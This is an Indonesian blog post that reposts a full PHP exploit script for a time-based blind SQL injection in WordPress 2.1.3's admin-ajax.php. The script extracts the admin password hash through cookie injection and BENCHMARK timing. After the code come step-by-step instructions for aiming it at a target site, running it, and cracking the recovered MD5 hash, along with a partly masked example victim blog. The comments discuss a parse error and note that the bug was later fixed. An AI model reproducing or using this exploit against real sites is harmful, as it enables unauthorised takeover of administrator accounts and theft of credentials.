Hacking wordpress

haha..aneh ya, gw oaje wordpress. tapi nemuin..hackingnya… sekerdar ilmu saja..tapi jangan dicoba diblog gw.kalo berhasil…kasih tau ..thanks

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 “admin-ajax.php” sql injection blind fishing exploit
// written by Janek Vind “waraxe”
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//================================================== ===================
$outfile = ‘./hacked.txt’;// Log file. Ingat kasih CHMOD 777
$url = ‘http://target_loe.xxx/wp-admin/admin-ajax.php&#8217;;
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value “1” is admin’s ID
$suffix = ”;// Override value, if needed
$prefix = ‘wp_’;// WordPress table prefix, default is “wp_”
//================================================== ====================

echo “Target: $url\n”;
echo “sql table prefix: $prefix\n”;

if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) – 24));
}

echo “cookie suffix: $suffix\n”;

echo “testing probe delays \n”;

$norm_delay = get_normdelay($testcnt);
echo “normal delay: $norm_delay deciseconds\n”;

$hash = get_hash();

add_line(“Target: $url”);
add_line(“User ID: $id”);
add_line(“Hash: $hash”);

echo “\nWork finished\n”;
echo “Questions and feedback – http://www.waraxe.us/ \n”;
die(“See ya!🙂 \n”);
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = ‘user_password’;
$out = ”;

echo “finding hash now …\n”;

for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo “got $field pos $i –> $ch\n”;
$out .= “$ch”;
echo “current value for $field: $out \n”;
}

echo “\nFinal result: $field=$out\n\n”;

return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = ”;
$cnt = $testcnt * 4;
$ppattern = ‘cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh’;
$ipattern = ” UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt, MD5(1337)),3)/*”;

// First let’s determine, if it’s number or letter
$inj = sprintf($ipattern, $prefix, $id, “>57”);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);

if($letter)
{
$min = 97;
$max = 102;
echo “char to find is [a-f]\n”;
}
else
{
$min = 48;
$max = 57;
echo “char to find is [0-9]\n”;
}

$curr = 0;

while(1)
{
$area = $max – $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, “=$max”);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);

if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}

break;
}

$half = intval(floor($area / 2));
$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, “>$curr”);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo “curr: $curr–$max–$min\n”;
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === ‘-1’)
{
break;
}
else
{
echo “test_condition() – try $try – invalid return value …\n”;
$try ++;
if($try > $maxtry)
{
die(“too many tries – exiting …\n”);
}
else
{
echo “trying again – try $try …\n”;
}
}
}

$diff = $end – $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo “$fa\n”;
$sa = test_md5delay($testcnt);
echo “$sa\n”;
$fb = test_md5delay(1);
echo “$fb\n”;
$sb = test_md5delay($testcnt);
echo “$sb\n”;
$fc = test_md5delay(1);
echo “$fc\n”;
$sc = test_md5delay($testcnt);
echo “$sc\n”;

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo “mean nondelayed – $mean_nondelayed dsecs\n”;
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo “mean delayed – $mean_delayed dsecs\n”;

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = ‘cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh’;
$ipattern = ‘ UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*’;
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die(“test_md5delay($cnt) – invalid return value, exiting …”);
}

$diff = $end – $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(” “, microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields=”, $cookie = ”, $referer = ”, $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)’);

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= “\n”;
$fh = fopen($outfile, ‘ab’);
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

Cara pemakaian :
1. Ganti $url ke target anda.
2. buat satu file kosong dengan attrib CHMOD 777 hacked.txt
3. Run it, jika sukses anda akan mendapatkan output seperti ini :

Target: http://blog.r******x.com/wp-admin/admin-ajax.php
User ID: 1
Md5 Hash: 9d150562e37ffeb3d8e4bf1*********

Last thing to do is crack the hash.

Ref : http://www.milw0rm.com/md5

m..ada 2 cara pemakaian.
A. Online / Host
1. Hosting ke server yang mendukung PHP
2. Terus save quote diatas dengan nama terserah.php
3. Buat satu file .txt kosong (contoh hacked.txt)
4. Upload kedua file tersebut
5. Set CHMOD (attribute) file 777 (read, write, edit untuk semua user)
6. Jalan kan terserah.php di web browser
7. Jika sukses, di hacked.txt akan muncul informasi seperti diatas.
8. Crack hash nya. Ada beberapa solusi.
– Crack sendiri menggunakan brute-force (butuh waktu berhari-hari)
– Post ke forum website yang menyediakan layanan cracking md5 (contoh : http://milw0rm.com/md5 atau http://waraxe.us)

B. Jalankan dengan PHP.exe
1. Pasti kan anda memiliki engine untuk execute PHP (misalnya apache2triad, or anything else)
2. save file diatas sesuai step A.2.
3. see A.3.
4. Buka command prompt, trus jalankan –> PHP.exe terserah.php
5. Lihat respond-nya, jika sukses : lihat step A.7.
6. Ikutin step A.8.

This entry was posted in Uncategorized. Bookmark the permalink.

4 thoughts on “Hacking wordpress

  1. to simple man….

  2. Bro ada error di

    Parse error: syntax error, unexpected ‘:’ in /home/blabla/public_html/blabla.php on line 13

    Bagaimana Tuh padahal dah sesuai…

  3. Parse error: syntax error, unexpected ‘:’ in /home/blabla/public_html/blabla.php on line 13

    coba cek dulu line 13…

  4. bugs wp, skrng udah difix in, bro..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s